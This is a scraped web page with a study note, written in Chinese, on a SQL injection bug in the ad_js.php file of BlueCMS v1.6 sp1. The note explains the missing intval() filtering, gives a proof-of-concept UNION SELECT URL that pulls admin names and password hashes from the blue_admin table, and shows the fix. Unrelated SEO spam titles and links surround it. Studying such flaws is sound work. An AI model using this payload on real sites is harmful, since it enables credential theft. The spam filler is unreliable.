当前位置: 首页 > news >正文

自学软件开发深圳高端seo外包公司

自学软件开发,深圳高端seo外包公司,做瓜子进出口用哪些网站,wordpress 如何上传头像漏洞信息类型内容编号141漏洞标题BlueCMS v1.6 sp1 ad_js.php SQL注入漏洞漏洞类型[SQL注射漏洞]厂商[BlueCMS]提交日期2010-07-30 19:49:00公开日期2010-07-30 21:52:00Confirm Spend-1漏洞标签php数字类型注射 注射技巧 BlueCMS漏洞简介BlueCMS v1.6 sp1 某页面SQL注入漏洞漏…

1ca826148c81

漏洞信息

类型

内容

编号

141

漏洞标题

BlueCMS v1.6 sp1 ad_js.php SQL注入漏洞

漏洞类型

[SQL注射漏洞]

厂商

[BlueCMS]

提交日期

2010-07-30 19:49:00

公开日期

2010-07-30 21:52:00

Confirm Spend

-1

漏洞标签

php+数字类型注射 注射技巧 BlueCMS

漏洞简介

BlueCMS v1.6 sp1 某页面SQL注入漏洞

漏洞成因

缺陷文件:ad_js.php

第12行: $ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : ''; 根目录下其他他文件都做了很好的过滤,对数字型变量几乎都用了intval()做限制,唯独漏了这个文件,居然只是用了trim()去除头尾空格。

第19行: $ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id); //直接代入查询。。汗。 |

验证漏洞

单引号判断法

1ca826148c81

BlueCMS v1.6 sp1 ad_js.php SQL注入漏

验证POC

POC : view-source:http://localhost/cms/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,concat(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)%20from%20blue_admin%20where%20admin_id=1

访问POC链接

1ca826148c81

漏洞修复

trim()函数修改为intval()函数,如下:

$ad_id = !empty($_GET['ad_id']) ? intval($_GET['ad_id']) : '';

重新访问POC测试效果

1ca826148c81

修复.png

笔记:

1.trim( )函数:移除字符串两侧的空白字符或其他预定义字符

语法

trim(string,charlist)

参数

描述

string

必需。规定要检查的字符串。

charlist

可选。规定从字符串中删除哪些字符。如果被省略,则移除以下所有字符

"\0" - NULL

"\t" - 制表符

"\n" - 换行

"\x0B" - 垂直制表符

"\r" - 回车

" " - 空格

intval()函数:获取变量的整数值

语法

intval ( mixed $var [, int $base = 10 ] )

通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。

参数

描述

var

要转换成 integer 的数量值

base

转化所使用的进制。

Note:

如果 base 是 0,通过检测 var 的格式来决定使用的进制:

如果字符串包括了 "0x" (或 "0X") 的前缀,使用 16 进制 (hex);否则,

如果字符串以 "0" 开始,使用 8 进制(octal);否则,

将使用 10 进制 (decimal)。

http://www.lbrq.cn/news/2653957.html

相关文章:

  • 网站设计为什么学不好营销客户管理系统
  • 做网站还有希望吗app制作公司
  • 网站推广积分一键注册所有网站
  • wordpress导入网站文章优化品牌seo关键词
  • 越秀网站建设价格怎么样免费做网站
  • 做一些网站犯法么google应用商店
  • seo chinazseo排名哪家正规
  • H5平台网站建设运营seo是什么意思
  • 网络下载的网站模板能直接上传到虚拟主机优化大师官网登录入口
  • 织梦网站上传新闻免费做推广的网站
  • wordpress 试用济南seo排名搜索
  • 网店运营教学排名优化工具下载
  • 做网站应该学什么语言今日油价92汽油价格
  • 中国铁道建筑集团有限公司seo资源咨询
  • dz论坛如何做网站地图网站seo的内容是什么
  • dw做网站小技巧建站推广
  • 厦门网站推广费用百度广告推广收费标准
  • 为什么教育网站做的都很烂seo整站优化哪家好
  • 贸易做网站百度灰色词排名代发
  • 教育网站开发公司百度最怕哪个投诉电话
  • 竞争者网站建设情况seo的作用是什么
  • php学什么可以做网站百度录入网站
  • 株洲做网站的公司公司网站制作
  • 关于设计网站seo点击优化
  • wordpress更好后台登录logo优化落实防控措施
  • 重庆品牌网站建设公司排名免费的发帖收录网站
  • 广州目前有疫情吗河南seo优化
  • 京伦科技做的网站如何球队排名世界
  • 网站建设 资产国际重大新闻事件2023
  • 网站策划书撰写流程厦门网
  • 【李宏毅-2024】第六讲 大语言模型的训练过程1——预训练(Pre-training)
  • 数据结构(一)顺序表
  • rotary_emb 位置编码 加速
  • 掌握长尾关键词SEO优化技巧
  • YOLO-Count:用于文本到图像生成的可微分目标计数
  • 第七篇:动画基础:requestAnimationFrame循环